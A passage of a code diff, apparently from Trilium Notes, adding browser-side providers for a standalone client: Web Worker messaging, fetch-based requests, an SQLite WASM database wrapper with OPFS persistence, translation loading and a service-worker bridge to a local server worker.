+            ? await crypto.subtle.encrypt({ name: "AES-CBC", iv: ivBuffer }, cryptoKey, data)
+            : await crypto.subtle.decrypt({ name: "AES-CBC", iv: ivBuffer }, cryptoKey, data);
+
+        return new Uint8Array(result);
+    }
+}

apps/client-standalone/src/lightweight/messaging_provider.ts

@@ -0,0 +1,120 @@
+import type { WebSocketMessage } from "@triliumnext/commons";
+import type { ClientMessageHandler, MessageHandler,MessagingProvider } from "@triliumnext/core";
+
+/**
+ * Messaging provider for browser Worker environments.
+ *
+ * This provider uses the Worker's postMessage API to communicate
+ * with the main thread. It's designed to be used inside a Web Worker
+ * that runs the core services.
+ *
+ * Message flow:
+ * - Outbound (worker → main): Uses self.postMessage() with type: "WS_MESSAGE"
+ * - Inbound (main → worker): Listens to onmessage for type: "WS_MESSAGE"
+ */
+export default class WorkerMessagingProvider implements MessagingProvider {
+    private messageHandlers: MessageHandler[] = [];
+    private clientMessageHandler?: ClientMessageHandler;
+    private isDisposed = false;
+
+    constructor() {
+        // Listen for incoming messages from the main thread
+        self.addEventListener("message", this.handleIncomingMessage);
+    }
+
+    private handleIncomingMessage = (event: MessageEvent) => {
+        if (this.isDisposed) return;
+
+        const { type, message } = event.data || {};
+
+        if (type === "WS_MESSAGE" && message) {
+            // Dispatch to the client message handler (used by ws.ts for log-error, log-info, ping)
+            if (this.clientMessageHandler) {
+                try {
+                    this.clientMessageHandler("main-thread", message);
+                } catch (e) {
+                    console.error("[WorkerMessagingProvider] Error in client message handler:", e);
+                }
+            }
+
+            // Dispatch to all registered handlers
+            for (const handler of this.messageHandlers) {
+                try {
+                    handler(message as WebSocketMessage);
+                } catch (e) {
+                    console.error("[WorkerMessagingProvider] Error in message handler:", e);
+                }
+            }
+        }
+    };
+
+    /**
+     * Send a message to all clients (in this case, the main thread).
+     * The main thread is responsible for further distribution if needed.
+     */
+    sendMessageToAllClients(message: WebSocketMessage): void {
+        if (this.isDisposed) {
+            console.warn("[WorkerMessagingProvider] Cannot send message - provider is disposed");
+            return;
+        }
+
+        try {
+            self.postMessage({
+                type: "WS_MESSAGE",
+                message
+            });
+        } catch (e) {
+            console.error("[WorkerMessagingProvider] Error sending message:", e);
+        }
+    }
+
+    /**
+     * Send a message to a specific client.
+     * In worker context, there's only one client (the main thread), so clientId is ignored.
+     */
+    sendMessageToClient(_clientId: string, message: WebSocketMessage): boolean {
+        if (this.isDisposed) {
+            return false;
+        }
+
+        this.sendMessageToAllClients(message);
+        return true;
+    }
+
+    /**
+     * Register a handler for incoming client messages.
+     */
+    setClientMessageHandler(handler: ClientMessageHandler): void {
+        this.clientMessageHandler = handler;
+    }
+
+    /**
+     * Subscribe to incoming messages from the main thread.
+     */
+    onMessage(handler: MessageHandler): () => void {
+        this.messageHandlers.push(handler);
+
+        return () => {
+            this.messageHandlers = this.messageHandlers.filter(h => h !== handler);
+        };
+    }
+
+    /**
+     * Get the number of connected "clients".
+     * In worker context, there's always exactly 1 client (the main thread).
+     */
+    getClientCount(): number {
+        return this.isDisposed ? 0 : 1;
+    }
+
+    /**
+     * Clean up resources.
+     */
+    dispose(): void {
+        if (this.isDisposed) return;
+
+        this.isDisposed = true;
+        self.removeEventListener("message", this.handleIncomingMessage);
+        this.messageHandlers = [];
+    }
+}

apps/client-standalone/src/lightweight/request_provider.ts

@@ -0,0 +1,93 @@
+import type { ExecOpts, RequestProvider } from "@triliumnext/core";
+
+/**
+ * Fetch-based implementation of RequestProvider for browser environments.
+ *
+ * Uses the Fetch API instead of Node's http/https modules.
+ * Proxy support is not available in browsers, so the proxy option is ignored.
+ */
+export default class FetchRequestProvider implements RequestProvider {
+
+    async exec<T>(opts: ExecOpts): Promise<T> {
+        const paging = opts.paging || {
+            pageCount: 1,
+            pageIndex: 0,
+            requestId: "n/a"
+        };
+
+        const headers: Record<string, string> = {
+            "Content-Type": paging.pageCount === 1 ? "application/json" : "text/plain",
+            "pageCount": String(paging.pageCount),
+            "pageIndex": String(paging.pageIndex),
+            "requestId": paging.requestId
+        };
+
+        // Note: the Cookie header is a forbidden header in fetch —
+        // the browser manages cookies automatically via credentials: 'include'.
+
+        if (opts.auth?.password) {
+            headers["trilium-cred"] = btoa(`dummy:${opts.auth.password}`);
+        }
+
+        let body: string | undefined;
+        if (opts.body) {
+            body = typeof opts.body === "object" ? JSON.stringify(opts.body) : opts.body;
+        }
+
+        const controller = new AbortController();
+        const timeoutId = opts.timeout
+            ? setTimeout(() => controller.abort(), opts.timeout)
+            : undefined;
+
+        try {
+            const response = await fetch(opts.url, {
+                method: opts.method,
+                headers,
+                body,
+                signal: controller.signal,
+                credentials: "include"
+            });
+
+            if ([200, 201, 204].includes(response.status)) {
+                const text = await response.text();
+                return text.trim() ? JSON.parse(text) : null;
+            }
+            const text = await response.text();
+            let errorMessage: string;
+            try {
+                const json = JSON.parse(text);
+                errorMessage = json?.message || "";
+            } catch {
+                errorMessage = text.substring(0, 100);
+            }
+            throw new Error(`Request to ${opts.method} ${opts.url} failed, error: ${response.status} ${response.statusText} ${errorMessage}`);
+
+        } catch (e: any) {
+            if (e.name === "AbortError") {
+                throw new Error(`Request to ${opts.method} ${opts.url} failed, error: timeout after ${opts.timeout}ms`);
+            }
+            if (e instanceof TypeError && e.message === "Failed to fetch") {
+                const isCrossOrigin = !opts.url.startsWith(location.origin);
+                if (isCrossOrigin) {
+                    throw new Error(`Request to ${opts.url} was blocked. The server may not allow requests from this origin (CORS), or it may be unreachable.`);
+                }
+                throw new Error(`Request to ${opts.url} failed. The server may be unreachable.`);
+            }
+            throw e;
+        } finally {
+            if (timeoutId) {
+                clearTimeout(timeoutId);
+            }
+        }
+    }
+
+    async getImage(imageUrl: string): Promise<ArrayBuffer> {
+        const response = await fetch(imageUrl);
+
+        if (!response.ok) {
+            throw new Error(`Request to GET ${imageUrl} failed, error: ${response.status} ${response.statusText}`);
+        }
+
+        return await response.arrayBuffer();
+    }
+}

apps/client-standalone/src/lightweight/sql_provider.ts

@@ -0,0 +1,613 @@
+import { type BindableValue, default as sqlite3InitModule } from "@sqlite.org/sqlite-wasm";
+import type { DatabaseProvider, RunResult, Statement, Transaction } from "@triliumnext/core";
+
+// Type definitions for SQLite WASM (the library doesn't export these directly)
+type Sqlite3Module = Awaited<ReturnType<typeof sqlite3InitModule>>;
+type Sqlite3Database = InstanceType<Sqlite3Module["oo1"]["DB"]>;
+type Sqlite3PreparedStatement = ReturnType<Sqlite3Database["prepare"]>;
+
+/**
+ * Wraps an SQLite WASM PreparedStatement to match the Statement interface
+ * expected by trilium-core.
+ */
+class WasmStatement implements Statement {
+    private isRawMode = false;
+    private isPluckMode = false;
+    private isFinalized = false;
+
+    constructor(
+        private stmt: Sqlite3PreparedStatement,
+        private db: Sqlite3Database,
+        private sqlite3: Sqlite3Module,
+        private sql: string
+    ) {}
+
+    run(...params: unknown[]): RunResult {
+        if (this.isFinalized) {
+            throw new Error("Cannot call run() on finalized statement");
+        }
+
+        this.bindParams(params);
+        try {
+            // Use step() and then reset instead of stepFinalize()
+            // This allows the statement to be reused
+            this.stmt.step();
+            const changes = this.db.changes();
+            // Get the last insert row ID using the C API
+            const lastInsertRowid = this.db.pointer ? this.sqlite3.capi.sqlite3_last_insert_rowid(this.db.pointer) : 0;
+            this.stmt.reset();
+            return {
+                changes,
+                lastInsertRowid: typeof lastInsertRowid === "bigint" ? Number(lastInsertRowid) : lastInsertRowid
+            };
+        } catch (e) {
+            // Reset on error to allow reuse
+            this.stmt.reset();
+            throw e;
+        }
+    }
+
+    get(params: unknown): unknown {
+        if (this.isFinalized) {
+            throw new Error("Cannot call get() on finalized statement");
+        }
+
+        this.bindParams(Array.isArray(params) ? params : params !== undefined ? [params] : []);
+        try {
+            if (this.stmt.step()) {
+                if (this.isPluckMode) {
+                    // In pluck mode, return only the first column value
+                    const row = this.stmt.get([]);
+                    return Array.isArray(row) && row.length > 0 ? row[0] : undefined;
+                }
+                return this.isRawMode ? this.stmt.get([]) : this.stmt.get({});
+            }
+            return undefined;
+        } finally {
+            this.stmt.reset();
+        }
+    }
+
+    all(...params: unknown[]): unknown[] {
+        if (this.isFinalized) {
+            throw new Error("Cannot call all() on finalized statement");
+        }
+
+        this.bindParams(params);
+        const results: unknown[] = [];
+        try {
+            while (this.stmt.step()) {
+                if (this.isPluckMode) {
+                    // In pluck mode, return only the first column value for each row
+                    const row = this.stmt.get([]);
+                    if (Array.isArray(row) && row.length > 0) {
+                        results.push(row[0]);
+                    }
+                } else {
+                    results.push(this.isRawMode ? this.stmt.get([]) : this.stmt.get({}));
+                }
+            }
+            return results;
+        } finally {
+            this.stmt.reset();
+        }
+    }
+
+    iterate(...params: unknown[]): IterableIterator<unknown> {
+        if (this.isFinalized) {
+            throw new Error("Cannot call iterate() on finalized statement");
+        }
+
+        this.bindParams(params);
+        const stmt = this.stmt;
+        const isRaw = this.isRawMode;
+        const isPluck = this.isPluckMode;
+
+        return {
+            [Symbol.iterator]() {
+                return this;
+            },
+            next(): IteratorResult<unknown> {
+                if (stmt.step()) {
+                    if (isPluck) {
+                        const row = stmt.get([]);
+                        const value = Array.isArray(row) && row.length > 0 ? row[0] : undefined;
+                        return { value, done: false };
+                    }
+                    return { value: isRaw ? stmt.get([]) : stmt.get({}), done: false };
+                }
+                stmt.reset();
+                return { value: undefined, done: true };
+            }
+        };
+    }
+
+    raw(toggleState?: boolean): this {
+        // In raw mode, rows are returned as arrays instead of objects
+        // If toggleState is undefined, enable raw mode (better-sqlite3 behavior)
+        this.isRawMode = toggleState !== undefined ? toggleState : true;
+        return this;
+    }
+
+    pluck(toggleState?: boolean): this {
+        // In pluck mode, only the first column of each row is returned
+        // If toggleState is undefined, enable pluck mode (better-sqlite3 behavior)
+        this.isPluckMode = toggleState !== undefined ? toggleState : true;
+        return this;
+    }
+
+    /**
+     * Detect the prefix used for a parameter name in the SQL query.
+     * SQLite supports @name, :name, and $name parameter styles.
+     * Returns the prefix character, or ':' as default if not found.
+     */
+    private detectParamPrefix(paramName: string): string {
+        // Search for the parameter with each possible prefix
+        for (const prefix of [':', '@', '$']) {
+            // Use word boundary to avoid partial matches
+            const pattern = new RegExp(`\\${prefix}${paramName}(?![a-zA-Z0-9_])`);
+            if (pattern.test(this.sql)) {
+                return prefix;
+            }
+        }
+        // Default to ':' if not found (most common in Trilium)
+        return ':';
+    }
+
+    private bindParams(params: unknown[]): void {
+        this.stmt.clearBindings();
+        if (params.length === 0) {
+            return;
+        }
+
+        // Handle single object with named parameters
+        if (params.length === 1 && typeof params[0] === "object" && params[0] !== null && !Array.isArray(params[0])) {
+            const inputBindings = params[0] as { [paramName: string]: BindableValue };
+
+            // SQLite WASM expects parameter names to include the prefix (@ : or $)
+            // We detect the prefix used in the SQL for each parameter
+            const bindings: { [paramName: string]: BindableValue } = {};
+            for (const [key, value] of Object.entries(inputBindings)) {
+                // If the key already has a prefix, use it as-is
+                if (key.startsWith('@') || key.startsWith(':') || key.startsWith('$')) {
+                    bindings[key] = value;
+                } else {
+                    // Detect the prefix used in the SQL and apply it
+                    const prefix = this.detectParamPrefix(key);
+                    bindings[`${prefix}${key}`] = value;
+                }
+            }
+
+            this.stmt.bind(bindings);
+        } else {
+            // Handle positional parameters - flatten and cast to BindableValue[]
+            const flatParams = params.flat() as BindableValue[];
+            if (flatParams.length > 0) {
+                this.stmt.bind(flatParams);
+            }
+        }
+    }
+
+    finalize(): void {
+        if (!this.isFinalized) {
+            try {
+                this.stmt.finalize();
+            } catch (e) {
+                console.warn("Error finalizing SQLite statement:", e);
+            } finally {
+                this.isFinalized = true;
+            }
+        }
+    }
+}
+
+/**
+ * SQLite database provider for browser environments using SQLite WASM.
+ *
+ * This provider wraps the official @sqlite.org/sqlite-wasm package to provide
+ * a DatabaseProvider implementation compatible with trilium-core.
+ *
+ * @example
+ * ```typescript
+ * const provider = new BrowserSqlProvider();
+ * await provider.initWasm(); // Initialize SQLite WASM module
+ * provider.loadFromMemory(); // Open an in-memory database
+ * // or
+ * provider.loadFromBuffer(existingDbBuffer); // Load from existing data
+ * ```
+ */
+export default class BrowserSqlProvider implements DatabaseProvider {
+    private db?: Sqlite3Database;
+    private sqlite3?: Sqlite3Module;
+    private _inTransaction = false;
+    private initPromise?: Promise<void>;
+    private initError?: Error;
+    private statementCache: Map<string, WasmStatement> = new Map();
+
+    // OPFS state tracking
+    private opfsDbPath?: string;
+
+    /**
+     * Get the SQLite WASM module version info.
+     * Returns undefined if the module hasn't been initialized yet.
+     */
+    get version(): { libVersion: string; sourceId: string } | undefined {
+        return this.sqlite3?.version;
+    }
+
+    /**
+     * Initialize the SQLite WASM module.
+     * This must be called before using any database operations.
+     * Safe to call multiple times - subsequent calls return the same promise.
+     *
+     * @returns A promise that resolves when the module is initialized
+     * @throws Error if initialization fails
+     */
+    async initWasm(): Promise<void> {
+        // Return existing promise if already initializing/initialized
+        if (this.initPromise) {
+            return this.initPromise;
+        }
+
+        // Fail fast if we already tried and failed
+        if (this.initError) {
+            throw this.initError;
+        }
+
+        this.initPromise = this.doInitWasm();
+        return this.initPromise;
+    }
+
+    private async doInitWasm(): Promise<void> {
+        try {
+            console.log("[BrowserSqlProvider] Initializing SQLite WASM...");
+            const startTime = performance.now();
+
+            this.sqlite3 = await sqlite3InitModule({
+                print: console.log,
+                printErr: console.error,
+            });
+
+            const initTime = performance.now() - startTime;
+            console.log(
+                `[BrowserSqlProvider] SQLite WASM initialized in ${initTime.toFixed(2)}ms:`,
+                this.sqlite3.version.libVersion
+            );
+        } catch (e) {
+            this.initError = e instanceof Error ? e : new Error(String(e));
+            console.error("[BrowserSqlProvider] SQLite WASM initialization failed:", this.initError);
+            throw this.initError;
+        }
+    }
+
+    /**
+     * Check if the SQLite WASM module has been initialized.
+     */
+    get isInitialized(): boolean {
+        return this.sqlite3 !== undefined;
+    }
+
+    // ==================== OPFS Support ====================
+
+    /**
+     * Check if the OPFS VFS is available.
+     * This requires:
+     * - Running in a Worker context
+     * - Browser support for OPFS APIs
+     * - COOP/COEP headers sent by the server (for SharedArrayBuffer)
+     *
+     * @returns true if OPFS VFS is available for use
+     */
+    isOpfsAvailable(): boolean {
+        this.ensureSqlite3();
+        // SQLite WASM automatically installs the OPFS VFS if the environment supports it
+        // We can check for its presence via sqlite3_vfs_find or the OpfsDb class
+        return this.sqlite3!.oo1.OpfsDb !== undefined;
+    }
+
+    /**
+     * Load or create a database stored in OPFS for persistent storage.
+     * The database will persist across browser sessions.
+     *
+     * Requires COOP/COEP headers to be set by the server:
+     * - Cross-Origin-Opener-Policy: same-origin
+     * - Cross-Origin-Embedder-Policy: require-corp
+     *
+     * @param path - The path for the database file in OPFS (e.g., "/trilium.db")
+     *               Paths without a leading slash are treated as relative to OPFS root.
+     *               Leading directories are created automatically.
+     * @param options - Additional options
+     * @throws Error if OPFS VFS is not available
+     *
+     * @example
+     * ```typescript
+     * const provider = new BrowserSqlProvider();
+     * await provider.initWasm();
+     * if (provider.isOpfsAvailable()) {
+     *     provider.loadFromOpfs("/my-database.db");
+     * } else {
+     *     console.warn("OPFS not available, using in-memory database");
+     *     provider.loadFromMemory();
+     * }
+     * ```
+     */
+    loadFromOpfs(path: string, options: { createIfNotExists?: boolean } = {}): void {
+        this.ensureSqlite3();
+
+        if (!this.isOpfsAvailable()) {
+            throw new Error(
+                "OPFS VFS is not available. This requires:\n" +
+                "1. Running in a Worker context\n" +
+                "2. Browser support for OPFS (Chrome 102+, Firefox 111+, Safari 17+)\n" +
+                "3. COOP/COEP headers from the server:\n" +
+                "   Cross-Origin-Opener-Policy: same-origin\n" +
+                "   Cross-Origin-Embedder-Policy: require-corp"
+            );
+        }
+
+        console.log(`[BrowserSqlProvider] Loading database from OPFS: ${path}`);
+        const startTime = performance.now();
+
+        try {
+            // OpfsDb automatically creates directories in the path
+            // Mode 'c' = create if not exists
+            const mode = options.createIfNotExists !== false ? 'c' : '';
+            this.db = new this.sqlite3!.oo1.OpfsDb(path, mode);
+            this.opfsDbPath = path;
+
+            // Configure the database for OPFS
+            // Note: WAL mode requires exclusive locking in OPFS environment
+            this.db.exec("PRAGMA journal_mode = DELETE");
+            this.db.exec("PRAGMA synchronous = NORMAL");
+
+            const loadTime = performance.now() - startTime;
+            console.log(`[BrowserSqlProvider] OPFS database loaded in ${loadTime.toFixed(2)}ms`);
+        } catch (e) {
+            const error = e instanceof Error ? e : new Error(String(e));
+            console.error(`[BrowserSqlProvider] Failed to load OPFS database: ${error.message}`);
+            throw error;
+        }
+    }
+
+    /**
+     * Check if the currently open database is stored in OPFS.
+     */
+    get isUsingOpfs(): boolean {
+        return this.opfsDbPath !== undefined;
+    }
+
+    /**
+     * Get the OPFS path of the currently open database.
+     * Returns undefined if not using OPFS.
+     */
+    get currentOpfsPath(): string | undefined {
+        return this.opfsDbPath;
+    }
+
+    /**
+     * Check if the database has been initialized with a schema.
+     * This is a simple sanity check that looks for the existence of core tables.
+     *
+     * @returns true if the database appears to be initialized
+     */
+    isDbInitialized(): boolean {
+        this.ensureDb();
+
+        // Check if the 'notes' table exists (a core table that must exist in an initialized DB)
+        const tableExists = this.db!.selectValue(
+            "SELECT name FROM sqlite_master WHERE type = 'table' AND name = 'notes'"
+        );
+
+        return tableExists !== undefined;
+    }
+
+    // ==================== End OPFS Support ====================
+
+    loadFromFile(_path: string, _isReadOnly: boolean): void {
+        // Browser environment doesn't have direct file system access.
+        // Use OPFS for persistent storage.
+        throw new Error(
+            "loadFromFile is not supported in browser environment. " +
+            "Use loadFromMemory() for temporary databases, loadFromBuffer() to load from data, " +
+            "or loadFromOpfs() for persistent storage."
+        );
+    }
+
+    /**
+     * Create an empty in-memory database.
+     * Data will be lost when the page is closed.
+     *
+     * For persistent storage, use loadFromOpfs() instead.
+     * To load demo data, call initializeDemoDatabase() after this.
+     */
+    loadFromMemory(): void {
+        this.ensureSqlite3();
+        console.log("[BrowserSqlProvider] Creating in-memory database...");
+        const startTime = performance.now();
+
+        this.db = new this.sqlite3!.oo1.DB(":memory:", "c");
+        this.opfsDbPath = undefined; // Not using OPFS
+        this.db.exec("PRAGMA journal_mode = WAL");
+
+        const loadTime = performance.now() - startTime;
+        console.log(`[BrowserSqlProvider] In-memory database created in ${loadTime.toFixed(2)}ms`);
+    }
+
+    loadFromBuffer(buffer: Uint8Array): void {
+        this.ensureSqlite3();
+        // SQLite WASM can deserialize a database from a byte array
+        const p = this.sqlite3!.wasm.allocFromTypedArray(buffer);
+        try {
+            this.db = new this.sqlite3!.oo1.DB({ filename: ":memory:", flags: "c" });
+            this.opfsDbPath = undefined; // Not using OPFS
+
+            const rc = this.sqlite3!.capi.sqlite3_deserialize(
+                this.db.pointer!,
+                "main",
+                p,
+                buffer.byteLength,
+                buffer.byteLength,
+                this.sqlite3!.capi.SQLITE_DESERIALIZE_FREEONCLOSE |
+                this.sqlite3!.capi.SQLITE_DESERIALIZE_RESIZEABLE
+            );
+            if (rc !== 0) {
+                throw new Error(`Failed to deserialize database: ${rc}`);
+            }
+        } catch (e) {
+            this.sqlite3!.wasm.dealloc(p);
+            throw e;
+        }
+    }
+
+    backup(_destinationFile: string): void {
+        // In browser, we can serialize the database to a byte array
+        // For actual file backup, we'd need to use File System Access API or download
+        throw new Error(
+            "backup to file is not supported in browser environment. " +
+            "Use serialize() to get the database as a Uint8Array instead."
+        );
+    }
+
+    /**
+     * Serialize the database to a byte array.
+     * This can be used to save the database to IndexedDB, download it, etc.
+     */
+    serialize(): Uint8Array {
+        this.ensureDb();
+        // Use the convenience wrapper which handles all the memory management
+        return this.sqlite3!.capi.sqlite3_js_db_export(this.db!);
+    }
+
+    prepare(query: string): Statement {
+        this.ensureDb();
+
+        // Check if we already have this statement cached
+        if (this.statementCache.has(query)) {
+            return this.statementCache.get(query)!;
+        }
+
+        // Create new statement and cache it
+        const stmt = this.db!.prepare(query);
+        const wasmStatement = new WasmStatement(stmt, this.db!, this.sqlite3!, query);
+        this.statementCache.set(query, wasmStatement);
+        return wasmStatement;
+    }
+
+    transaction<T>(func: (statement: Statement) => T): Transaction {
+        this.ensureDb();
+
+        const self = this;
+        let savepointCounter = 0;
+
+        // Helper function to execute within a transaction
+        const executeTransaction = (beginStatement: string, ...args: unknown[]): T => {
+            // If we're already in a transaction, use SAVEPOINTs for nesting
+            // This mimics better-sqlite3's behavior
+            if (self._inTransaction) {
+                const savepointName = `sp_${++savepointCounter}_${Date.now()}`;
+                self.db!.exec(`SAVEPOINT ${savepointName}`);
+                try {
+                    const result = func.apply(null, args as [Statement]);
+                    self.db!.exec(`RELEASE SAVEPOINT ${savepointName}`);
+                    return result;
+                } catch (e) {
+                    self.db!.exec(`ROLLBACK TO SAVEPOINT ${savepointName}`);
+                    throw e;
+                }
+            }
+
+            // Not in a transaction, start a new one
+            self._inTransaction = true;
+            self.db!.exec(beginStatement);
+            try {
+                const result = func.apply(null, args as [Statement]);
+                self.db!.exec("COMMIT");
+                return result;
+            } catch (e) {
+                self.db!.exec("ROLLBACK");
+                throw e;
+            } finally {
+                self._inTransaction = false;
+            }
+        };
+
+        // Create the transaction function that acts like better-sqlite3's Transaction interface
+        // In better-sqlite3, the transaction function is callable and has .deferred(), .immediate(), etc.
+        const transactionWrapper = Object.assign(
+            // Default call executes with BEGIN (same as immediate)
+            (...args: unknown[]): T => executeTransaction("BEGIN", ...args),
+            {
+                // Deferred transaction - locks acquired on first data access
+                deferred: (...args: unknown[]): T => executeTransaction("BEGIN DEFERRED", ...args),
+                // Immediate transaction - acquires write lock immediately
+                immediate: (...args: unknown[]): T => executeTransaction("BEGIN IMMEDIATE", ...args),
+                // Exclusive transaction - exclusive lock
+                exclusive: (...args: unknown[]): T => executeTransaction("BEGIN EXCLUSIVE", ...args),
+                // Default is same as calling directly
+                default: (...args: unknown[]): T => executeTransaction("BEGIN", ...args)
+            }
+        );
+
+        return transactionWrapper as unknown as Transaction;
+    }
+
+    get inTransaction(): boolean {
+        return this._inTransaction;
+    }
+
+    exec(query: string): void {
+        this.ensureDb();
+        this.db!.exec(query);
+    }
+
+    close(): void {
+        // Clean up all cached statements first
+        for (const statement of this.statementCache.values()) {
+            try {
+                statement.finalize();
+            } catch (e) {
+                // Ignore errors during cleanup
+                console.warn("Error finalizing statement during cleanup:", e);
+            }
+        }
+        this.statementCache.clear();
+
+        if (this.db) {
+            this.db.close();
+            this.db = undefined;
+        }
+
+        // Reset OPFS state
+        this.opfsDbPath = undefined;
+    }
+
+    /**
+     * Get the number of rows changed by the last INSERT, UPDATE, or DELETE statement.
+     */
+    changes(): number {
+        this.ensureDb();
+        return this.db!.changes();
+    }
+
+    /**
+     * Check if the database is currently open.
+     */
+    isOpen(): boolean {
+        return this.db !== undefined && this.db.isOpen();
+    }
+
+    private ensureSqlite3(): void {
+        if (!this.sqlite3) {
+            throw new Error(
+                "SQLite WASM module not initialized. Call initialize() first with the sqlite3 module."
+            );
+        }
+    }
+
+    private ensureDb(): void {
+        this.ensureSqlite3();
+        if (!this.db) {
+            throw new Error("Database not opened. Call loadFromMemory(), loadFromBuffer(), or loadFromOpfs() first.");
+        }
+    }
+}

apps/client-standalone/src/lightweight/translation_provider.ts

@@ -0,0 +1,16 @@
+import { LOCALE_IDS } from "@triliumnext/commons";
+import type i18next from "i18next";
+import I18NextHttpBackend from "i18next-http-backend";
+
+export default async function translationProvider(i18nextInstance: typeof i18next, locale: LOCALE_IDS) {
+    await i18nextInstance.use(I18NextHttpBackend).init({
+        lng: locale,
+        fallbackLng: "en",
+        ns: "server",
+        backend: {
+            loadPath: `${import.meta.resolve("../server-assets/translations")}/{{lng}}/{{ns}}.json`
+        },
+        returnEmptyString: false,
+        debug: true
+    });
+}

apps/client-standalone/src/local-bridge.ts

@@ -0,0 +1,98 @@
+import LocalServerWorker from "./local-server-worker?worker";
+let localWorker: Worker | null = null;
+const pending = new Map();
+
+export function startLocalServerWorker() {
+    if (localWorker) return localWorker;
+    localWorker = new LocalServerWorker();
+
+    // Handle worker errors during initialization
+    localWorker.onerror = (event) => {
+        console.error("[LocalBridge] Worker error:", event);
+        // Reject all pending requests
+        for (const [, resolver] of pending) {
+            resolver.reject(new Error(`Worker error: ${event.message}`));
+        }
+        pending.clear();
+    };
+
+    localWorker.onmessage = (event) => {
+        const msg = event.data;
+
+        // Handle worker error reports
+        if (msg?.type === "WORKER_ERROR") {
+            console.error("[LocalBridge] Worker reported error:", msg.error);
+            // Reject all pending requests with the error
+            for (const [, resolver] of pending) {
+                resolver.reject(new Error(msg.error?.message || "Unknown worker error"));
+            }
+            pending.clear();
+            return;
+        }
+
+        // Handle WebSocket-like messages from the worker (for frontend updates)
+        if (msg?.type === "WS_MESSAGE" && msg.message) {
+            // Dispatch a custom event that ws.ts listens to in standalone mode
+            window.dispatchEvent(new CustomEvent("trilium:ws-message", {
+                detail: msg.message
+            }));
+            return;
+        }
+
+        if (!msg || msg.type !== "LOCAL_RESPONSE") return;
+
+        const { id, response, error } = msg;
+        const resolver = pending.get(id);
+        if (!resolver) return;
+        pending.delete(id);
+
+        if (error) resolver.reject(new Error(error));
+        else resolver.resolve(response);
+    };
+
+    return localWorker;
+}
+
+export function attachServiceWorkerBridge() {
+    navigator.serviceWorker.addEventListener("message", async (event) => {
+        const msg = event.data;
+        if (!msg || msg.type !== "LOCAL_FETCH") return;
+
+        const port = event.ports && event.ports[0];
+        if (!port) return;
+
+        try {
+            startLocalServerWorker();
+
+            const id = msg.id;
+            const req = msg.request;
+
+            const response = await new Promise<{ body?: ArrayBuffer }>((resolve, reject) => {
+                pending.set(id, { resolve, reject });
+                // Transfer body to worker for efficiency (if present)
+                localWorker!.postMessage({
+                    type: "LOCAL_REQUEST",
+                    id,
+                    request: req
+                }, req.body ? [req.body] : []);
+            });
+
+            port.postMessage({
+                type: "LOCAL_FETCH_RESPONSE",
+                id,
+                response
+            }, response.body ? [response.body] : []);
+        } catch (e: unknown) {
+            const errorMessage = e instanceof Error ? e.message : String(e);
+            port.postMessage({
+                type: "LOCAL_FETCH_RESPONSE",
+                id: msg.id,
+                response: {
+                    status: 500,
+                    headers: { "content-type": "text/plain; charset=utf-8" },
+                    body: new TextEncoder().encode(errorMessage).buffer
+                }
+            });
+        }
+    });
+}

apps/client-standalone/src/local-server-worker.ts

@@ -0,0 +1,260 @@
+// =============================================================================
+// ERROR HANDLERS FIRST - No static imports above this!
+// ES modules hoist static imports, so they execute BEFORE any code runs.
+// We use dynamic imports below to ensure error handlers are registered first.
+// =============================================================================
+
+self.onerror = (message, source, lineno, colno, error) => {
+    const errorMsg = `[Worker] Uncaught error: ${message}\n  at ${source}:${lineno}:${colno}`;
+    console.error(errorMsg, error);
+    try {
+        self.postMessage({
+            type: "WORKER_ERROR",
+            error: {
+                message: String(message),
+                source,
+                lineno,
+                colno,
+                stack: error?.stack || new Error().stack
+            }
+        });
+    } catch (e) {
+        console.error("[Worker] Failed to report error:", e);
+    }
+    return false;
+};
+
+self.onunhandledrejection = (event) => {
+    const reason = event.reason;
+    const errorMsg = `[Worker] Unhandled rejection: ${reason?.message || reason}`;
+    console.error(errorMsg, reason);
+    try {
+        self.postMessage({
+            type: "WORKER_ERROR",
+            error: {
+                message: String(reason?.message || reason),
+                stack: reason?.stack || new Error().stack
+            }
+        });
+    } catch (e) {
+        console.error("[Worker] Failed to report rejection:", e);
+    }
+};
+
+console.log("[Worker] Error handlers installed, loading modules...");
+
+// =============================================================================
+// TYPE-ONLY IMPORTS (erased at runtime, safe as static imports)
+// =============================================================================
+import type { BrowserRouter } from './lightweight/browser_router';
+
+// =============================================================================
+// MODULE STATE (populated by dynamic imports)
+// =============================================================================
+let BrowserSqlProvider: typeof import('./lightweight/sql_provider').default;
+let WorkerMessagingProvider: typeof import('./lightweight/messaging_provider').default;
+let BrowserExecutionContext: typeof import('./lightweight/cls_provider').default;
+let BrowserCryptoProvider: typeof import('./lightweight/crypto_provider').default;
+let FetchRequestProvider: typeof import('./lightweight/request_provider').default;
+let translationProvider: typeof import('./lightweight/translation_provider').default;
+let createConfiguredRouter: typeof import('./lightweight/browser_routes').createConfiguredRouter;
+
+// Instance state
+let sqlProvider: InstanceType<typeof BrowserSqlProvider> | null = null;
+let messagingProvider: InstanceType<typeof WorkerMessagingProvider> | null = null;
+
+// Core module, router, and initialization state
+let coreModule: typeof import("@triliumnext/core") | null = null;
+let router: BrowserRouter | null = null;
+let initPromise: Promise<void> | null = null;
+let initError: Error | null = null;
+
+/**
+ * Load all required modules using dynamic imports.
+ * This allows errors to be caught by our error handlers.
+ */
+async function loadModules(): Promise<void> {
+    console.log("[Worker] Loading lightweight modules...");
+    const [
+        sqlModule,
+        messagingModule,
+        clsModule,
+        cryptoModule,
+        requestModule,
+        translationModule,
+        routesModule
+    ] = await Promise.all([
+        import('./lightweight/sql_provider.js'),
+        import('./lightweight/messaging_provider.js'),
+        import('./lightweight/cls_provider.js'),
+        import('./lightweight/crypto_provider.js'),
+        import('./lightweight/request_provider.js'),
+        import('./lightweight/translation_provider.js'),
+        import('./lightweight/browser_routes.js')
+    ]);
+
+    BrowserSqlProvider = sqlModule.default;
+    WorkerMessagingProvider = messagingModule.default;
+    BrowserExecutionContext = clsModule.default;
+    BrowserCryptoProvider = cryptoModule.default;
+    FetchRequestProvider = requestModule.default;
+    translationProvider = translationModule.default;
+    createConfiguredRouter = routesModule.createConfiguredRouter;
+
+    // Create instances
+    sqlProvider = new BrowserSqlProvider();
+    messagingProvider = new WorkerMessagingProvider();
+
+    console.log("[Worker] Lightweight modules loaded successfully");
+}
+
+/**
+ * Initialize SQLite WASM and load the core module.
+ * This happens once at worker startup.
+ */
+async function initialize(): Promise<void> {
+    if (initPromise) {
+        return initPromise; // Already initializing
+    }
+    if (initError) {
+        throw initError; // Failed before, don't retry
